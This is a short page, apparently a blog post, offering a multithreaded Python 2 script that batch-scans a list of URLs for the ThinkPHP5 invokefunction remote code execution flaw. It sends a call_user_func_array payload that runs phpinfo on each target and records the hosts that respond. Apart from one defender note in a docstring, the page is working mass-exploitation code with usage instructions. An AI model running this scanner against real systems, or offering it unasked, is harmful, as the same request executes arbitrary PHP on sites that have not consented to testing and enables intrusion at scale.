Thinkphp5命令执行批量验证脚本
thinkphp5命令执行¶
POC检测代码¶
# -*- coding:UTF-8 -*-
# env: python2
import requests
import threading
import time
import sys
class check(threading.Thread):  # worker thread that decides whether one target answers the probe
    """Probe a single URL for the ThinkPHP5 ``invokefunction`` code-execution flaw.

    ``run()`` sends one GET to ``url`` with the query string in ``parameters``
    (3 s timeout) and treats the marker ``'PHP Extension'`` in the response
    body as a positive result: it is what the requested ``phpinfo`` call is
    expected to print. Positives are appended to ``success.txt`` and echoed
    as ``[+] url``; everything else is ``[-] url``. Any ``Exception`` from the
    request is swallowed and reported as ``connect failed``.

    Defender note: the query string below (``\\think\\app/invokefunction``
    together with ``function=call_user_func_array``) is the fingerprint of
    this probe and is a reasonable thing to alert on in web-server/WAF logs.

    Args:
        url: full URL to probe (the caller already appended ``/public/index.php``).
        sem: ``threading.Semaphore`` bounding concurrent workers; released
            when this thread finishes.
    """
    def __init__(self, url, sem):
        super(check, self).__init__()  # call Thread's constructor; on python3 this is written super().__init__()
        self.url = url
        self.sem = sem
    def run(self):
        # Pre-encoded query string; requests appends a str `params` value to the URL as-is.
        parameters = "s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
        try:
            responce = requests.get(url = self.url, params = parameters,timeout=3)
            body = responce.text
            # phpinfo output contains the literal 'PHP Extension' heading; absence means the
            # call was not executed (or the response was something else entirely).
            if body.find('PHP Extension') != -1:
                with open("success.txt", "a+") as f1:
                    f1.write("存在tp5远程代码执行漏洞: " + self.url + "\n")
                print("[+] " + self.url)
            else:
                print("[-] " + self.url)
        except Exception,err:  # python2 syntax; `err` is not used
            # Timeouts, DNS failures, connection errors etc. all end up here.
            print("connect failed")
            pass
        # Released after the try/except so the slot is freed on both outcomes,
        # letting host() start the next probe.
        self.sem.release()
class host(threading.Thread):  # walks the URL file and spawns one check() per line
    """Reader thread: iterate ``url.txt`` and start a ``check`` worker per line.

    Before each worker is started ``sem.acquire()`` is called, so the number
    of live ``check`` threads never exceeds the semaphore's initial count; the
    worker releases the slot itself when it finishes.

    Args:
        sem: ``threading.Semaphore`` shared with every ``check`` worker.
    """
    def __init__(self, sem):
        super(host, self).__init__()  # call Thread's constructor; on python3 this is written super().__init__()
        self.sem = sem
    def run(self):
        with open("url.txt", "r") as f:
            for host in f.readlines():  # NOTE: loop variable shadows the class name `host` inside run()
                self.sem.acquire()  # one slot per URL; blocks once the maximum number of workers is busy
                # Assumes each line is a base URL without a trailing slash — TODO confirm input format.
                host = host.strip()+"/public/index.php"
                host_thread = check(host, self.sem)
                host_thread.start()  # runs check.run(); that thread releases the slot when done
if __name__ == '__main__':
    # At most 10 check() probes in flight: host() takes a slot before starting
    # each worker and the worker gives it back when it finishes.
    max_workers = threading.Semaphore(10)
    reader = host(max_workers)
    reader.start()
使用方法:在当前目录下创建 ./url.txt(为需要检测的 url,每行一个),success.txt 为含有漏洞的 url。